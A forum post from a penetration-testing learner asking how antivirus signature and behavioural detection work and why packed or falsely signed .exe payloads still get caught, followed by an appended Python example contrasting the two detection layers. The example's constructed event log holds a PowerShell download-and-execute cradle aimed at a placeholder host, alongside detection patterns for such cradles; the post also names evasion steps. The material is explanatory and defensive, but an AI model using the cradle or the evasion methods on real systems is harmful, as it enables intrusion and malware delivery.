I recently started learning about ethical hacking and penetration testing. Along the way, as I am sure many people do when learning about these topics, I have encountered some obstacles. I will not write an essay about my daily life and study schedule, because I know that I would simply become super famous and would never get any peace. Or I'll bore everyone to death. So I'm going to cut to the chase …
My first question is this:
1) Antivirus software works by means of signature-based detection. Signature-based detection evaluates items (perhaps not the correct word?) against a large database of known threats. The software carries with it its own digital signature. If the signature of a particular item matches a known signature in the database, it is flagged as malicious and the necessary steps are taken.
- Do AVs depend solely on this method?
- Let's say, for example, that the malware gets past the AV (because its signature is new); is the malware then home and dry?
- Or do things such as behavioural analysis still come into play? Let's say the malware executes known commands or uses known components: the Metasploit framework, Empire, etc. The malware has already got past the AV in terms of signature-based detection, provided that the malware is clean. Are there other ways in which other defences can detect the malicious activity?
- How long does the AV "hang on" to a particular executable? Let's say it starts scanning it the moment it hits the disk. Okay, it's clean (according to the AV); will it approve the executable, decrease its vigilance, increase it, put it on the whitelist or ignore it?
2) Are binary executables dead in terms of initiating malicious payloads?
- I see many articles about known threats, particularly from the past, where the malicious payload was not simply downloaded in executable format and then executed. A payload can, for example, be hidden in a PDF or a Word document, and even then the payload has not yet been executed and is simply downloaded by a PowerShell command.
- When, if ever, are binary executable payloads in .exe format useful in an attack? It's obvious to me that AV vendors today dissect and tear apart many .exe payloads, and rightly so. From what I have learned, it is by far the most common attack vector (if that is the correct way to put it?) and also the oldest and most used. A person downloads a file that he thinks is legitimate; it isn't, it sets up a reverse shell, done. Or a person downloads a file, believes it is legitimate, and it is a keylogger or a RAT, done.
I still feel that there is more going on behind the scenes. The more I have got into the task of exploiting a Windows-based system (in my own lab environment), the harder and sometimes messier it can be simply to get the thing onto the computer in the first place. I have used hex editors, UPX, added useless DLLs and resources to confuse detection analysis, falsely signed executables, modified exe templates and yet … I feel something is missing …
I appreciate comments on this!
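A toy illustration of the two detection layers asked about in question 1, added here as an example and not part of the original post: a static signature check (full-file hash plus a byte pattern) next to a behavioural check over observed command lines. Every sample, hash and rule below is constructed; the point is that a sample whose bytes no longer match any signature can still be caught by what it does at run time.

```python
import hashlib
import re

# Constructed stand-in for a known-bad file; the "database" holds its SHA-256.
ORIGINAL_SAMPLE = b"MZ\x90\x00 ORIGINAL_MALWARE_BODY stage1"
KNOWN_BAD_SHA256 = {hashlib.sha256(ORIGINAL_SAMPLE).hexdigest()}

# Byte-pattern signatures match a substring, so they survive small edits
# elsewhere in the file but not a change to the matched bytes themselves.
BYTE_SIGNATURES = {"toy-stager-marker": b"ORIGINAL_MALWARE_BODY"}

# Constructed stand-in for the same sample after repacking: the marker is gone,
# so the hash differs and the byte pattern no longer occurs.
REPACKED_SAMPLE = ORIGINAL_SAMPLE.replace(b"ORIGINAL_MALWARE_BODY", b"<packed blob>")

# Behavioural rules look at what a process does (here: its command line),
# not at the bytes of the file that started it.
BEHAVIOR_RULES = {
    "powershell-download-cradle": re.compile(
        r"powershell.*\b(DownloadString|IEX|Invoke-Expression)\b", re.IGNORECASE),
    "known-tool-component": re.compile(r"\b(meterpreter|Invoke-Empire)\b", re.IGNORECASE),
}

# Constructed process-creation log: the second entry is a typical download cradle.
EVENTS = [
    "explorer.exe",
    "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/p')",
]


def signature_scan(data: bytes) -> list:
    """Static layer: exact hash lookup, then byte-pattern signatures."""
    hits = []
    if hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256:
        hits.append("hash-match")
    hits.extend(name for name, pat in BYTE_SIGNATURES.items() if pat in data)
    return hits


def behavior_scan(events: list) -> list:
    """Dynamic layer: rule names that fire on any observed command line."""
    return [name for line in events for name, rule in BEHAVIOR_RULES.items()
            if rule.search(line)]


def verdict(data: bytes, events: list) -> dict:
    """Combine both layers; either one firing marks the sample malicious."""
    static, dynamic = signature_scan(data), behavior_scan(events)
    return {"static": static, "behavioral": dynamic,
            "malicious": bool(static or dynamic)}
```

Running `verdict(REPACKED_SAMPLE, EVENTS)` gives an empty static list but a behavioural hit, which is the case the question describes: the file is "clean" to the signature layer and still flagged by what it does.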